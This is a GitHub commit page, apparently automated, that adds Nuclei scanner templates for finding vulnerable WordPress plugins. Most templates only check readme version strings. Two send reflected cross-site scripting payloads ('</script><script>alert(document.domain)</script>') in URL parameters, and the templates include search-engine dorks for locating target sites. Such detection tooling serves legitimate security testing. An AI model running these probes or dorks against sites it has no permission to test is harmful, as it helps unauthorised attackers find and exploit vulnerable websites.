Skip to content

Commit

Permalink
20241206
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 6, 2024
1 parent 4dc726a commit 55abde8
Show file tree
Hide file tree
Showing 254 changed files with 14,865 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241205
20241206
252 changes: 252 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

59 changes: 59 additions & 0 deletions poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db

info:
name: >
Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/capitalize-my-title/"
google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,capitalize-my-title,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "capitalize-my-title"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 0.5.3')
59 changes: 59 additions & 0 deletions poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: cookielay-d1709b11e04e7ac0020e84fff5516e5a

info:
name: >
Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/cookielay/"
google-query: inurl:"/wp-content/plugins/cookielay/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,cookielay,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "cookielay"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.2.0')
59 changes: 59 additions & 0 deletions poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: mycred-b69b74183494c4b8dbaaa94b47c77a89

info:
name: >
myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/mycred/"
google-query: inurl:"/wp-content/plugins/mycred/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,mycred,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "mycred"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.7.5.2')
59 changes: 59 additions & 0 deletions poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: otp-login-59e25716cd4187f6ae0041590ffc4112

info:
name: >
Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
author: topscoder
severity: critical
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/otp-login/"
google-query: inurl:"/wp-content/plugins/otp-login/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,otp-login,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "otp-login"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.4.2')
Original file line number Diff line number Diff line change
@@ -0,0 +1,59 @@
id: third-party-cookie-eraser-a95c341c56a938945d517c311512eb15

info:
name: >
Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "third-party-cookie-eraser"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.2')
35 changes: 35 additions & 0 deletions poc/cve/CVE-2011-4926-2089.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4926
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
- http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
- http://www.openwall.com/lists/oss-security/2012/01/10/9
classification:
cve-id: CVE-2011-4926
metadata:
google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
25 changes: 25 additions & 0 deletions poc/cve/CVE-2011-5181-2118.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
Loading

0 comments on commit 55abde8

Please sign in to comment.